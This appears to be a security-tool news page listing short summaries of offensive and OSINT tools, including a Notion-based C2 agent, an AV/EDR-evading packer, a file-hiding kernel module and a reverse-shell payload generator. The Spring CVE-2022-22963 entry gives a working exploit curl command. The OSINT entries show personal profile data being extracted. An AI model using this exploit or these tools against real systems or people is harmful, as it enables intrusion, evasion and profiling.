OffensiveNotion : Notion As A Platform For Offensive Operations

OffensiveNotion combines the capabilities of a post-exploitation agent with the power and comfort of the Notion notetaking application. The agent sends data to and receives commands from your Notion page. Your C2 traffic blends right in as the agent receives instructions and posts results via the Notion developer API. And when your blue team looks for evidence of shenanigans,...

CVE-2022-27254 : PoC For Vulnerability In Honda’s Remote Keyless System

CVE-2022-27254 is a PoC for a vulnerability in Honda's Remote Keyless System (CVE-2022-27254). Summary: This is a proof of concept for CVE-2022-27254, wherein the remote keyless system on various Honda vehicles sends the same, unencrypted RF signal for each door-open, door-close, boot-open and remote-start (if applicable) command. This allows an attacker to eavesdrop on the request and conduct a replay attack. Vehicles Affected: 2016-2020 Honda...

CVE-2022-22963 : PoC Spring Java Framework 0-day Remote Code Execution Vulnerability

CVE-2022-22963: To run the vulnerable SpringBoot application, run this docker container, exposing it on port 8080. Example:
docker run -it -d -p 8080:8080 bobcheat/springboot-public
Exploit curl command:
curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:8080' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("touch /tmp/test")' --data-binary $'exploit_poc' $'http://192.168.1.2:8080/functionRouter'
Or using Burp Suite: Download

Casper-Fs : A Custom Hidden Linux Kernel Module Generator

Casper-fs is a custom Linux Kernel Module generator that builds modules to protect or hide a custom list of files. Each LKM has resources to protect or hide files following a custom list in the YAML rule file. Yes, not even root has permission to see the files or perform actions like edit and remove. The files...

LAZYPARIAH : A Tool For Generating Reverse Shell Payloads On The Fly

LAZYPARIAH is a simple and easily installable command-line tool written in pure Ruby that can be used during penetration tests and capture-the-flag (CTF) competitions to generate a range of reverse shell payloads on the fly. The reverse shell payloads that LAZYPARIAH supports include (but are not limited to):
C binary payloads (compiled on the fly): c_binary
Ruby payloads: ruby, ruby_b64, ruby_hex, ruby_c
Powershell payloads: powershell_c, powershell_b64
Base64-encoded Python payloads: python_b64
Rust binary payloads...

Socid-Extractor : Extract Accounts Info From Personal Pages On Various Sites For OSINT Purpose

Socid-Extractor extracts information about a user from profile webpages / API responses and saves it in a machine-readable format. Usage: As a command-line tool:
$ socid_extractor --url https://www.deviantart.com/muse1908
country: France
created_at: 2005-06-16 18:17:41
gender: female
username: Muse1908
website: www.patreon.com/musemercier
links:
tagline: Nothing worth having is easy…
Without installing:
$ ./run.py --url https://www.deviantart.com/muse1908
As a Python library:
import socid_extractor, requests
r = requests.get('https://www.patreon.com/annetlovart')
socid_extractor.extract(r.text)
{'patreon_id': '33913189', 'patreon_username': 'annetlovart', 'fullname': 'Annet Lovart', 'links': ""}
Installation:
$ pip3 install socid-extractor
The latest...

Gitcolombo : Extract And Analyze Contributors Info From Git Repos

Gitcolombo is an OSINT tool to extract info about persons from git repositories: common names, emails, and matches between (seemingly) different accounts. Usage: Install git. Run:
from any git url: ./gitcolombo.py -u https://github.com/Kalanchyovskaia16/newlps
from a directory, recursively: ./gitcolombo.py -d ./newlps -r
from all GitHub personal/org repos by nickname: ./gitcolombo.py --nickname LubyRuffy
For batch cloning from Gitlab and Bitbucket group repos you can use ghorg. Output: verbose persons info: name, email, number of appearances...

Nimcrypt2 : .NET, PE, And Raw Shellcode Packer/Loader Written In Nim

Nimcrypt2 is yet another PE packer/loader designed to bypass AV/EDR. It is an improvement on my original Nimcrypt project, with the main improvements being the use of direct syscalls and the ability to load regular PE files as well as raw shellcode. Before going any further, I must acknowledge those who did the VAST majority of work and research that this project...

Ostorlab : A Security Scanning Platform That Enables Running Complex Security Scanning Tasks

Ostorlab: Security testing often requires chaining tools together, taking the output from one, mangling it, filtering it and then pushing it to another tool. Several tools have tried to make the process less painful. Ostorlab addresses the same challenge by simplifying the hardest part and automating the boring and tedious parts. To do that, Ostorlab focuses on the...

Zkar : A Java Serialization Protocol Analysis Tool Implemented In Go

ZKar is a Java serialization protocol analysis tool implemented in Go. This tool is still a work in progress, so there is no complete API document or contribution guide yet. ZKar provides:
A Java serialization payload parser and viewer in pure Go; no CGO or JDK is required
Conversion from the Java serialization protocol to a Go struct
A Go library that can manipulate Java serialization data
WIP: ysoserial implemented in...